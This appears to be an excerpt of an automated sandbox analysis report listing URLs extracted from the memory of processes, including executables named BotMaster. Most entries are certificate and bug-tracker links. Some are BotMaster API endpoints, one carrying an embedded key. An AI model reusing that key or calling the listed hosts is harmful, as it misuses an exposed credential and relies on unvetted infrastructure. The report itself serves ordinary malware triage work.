                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323167129.000030DC00158000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036)
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036ides
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3698431813.00002DDC0077C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279)
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323167129.000030DC00158000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724W
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724ancedG
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724r
                  Source: msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323167129.000030DC00158000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760F
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760ault
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3671436412.000030DC002A4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                  Source: msedgewebview2.exe, 0000001D.00000003.2333041400.00002DDC00D44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2332939944.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3700547825.00002DDC0088C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323248288.000030DC00178000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3667669630.000030DC0020C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2345367924.000030DC00190000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323294945.000030DC00184000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/82800
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280ldData
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bd.gy912.com
                  Source: msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bit.ly/2kdckMn
                  Source: BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://botmaster.mediaplus.me
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://botmaster.mediaplus.me/api/v1/checkKey.ashxAError
                  Source: BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://botmaster.mediaplus.me/api/v2/getwapi.ashx?key=Ju9SWyJu9WQwgnmtZo7m2meGaJg8ciMVZGByC
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://botmaster.mediaplus.me/api/v2/getwapi.ashx?key=Ju9SWyJu9WQwgnmtZo7m2meGaJg8ciMVZGByC3https://
                  Source: BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmp, BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://businesswhatsappsender.mediaplus.me/api/v1/GetExKey.ashx
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/Dig
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdmg.yuchiweb.icu
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://click.dotmap.co.kr/?pf_code=
                  Source: svchost.exe, 0000001B.00000002.3646072931.000002A2C3E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                  Source: msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3648242608.00001B4400178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
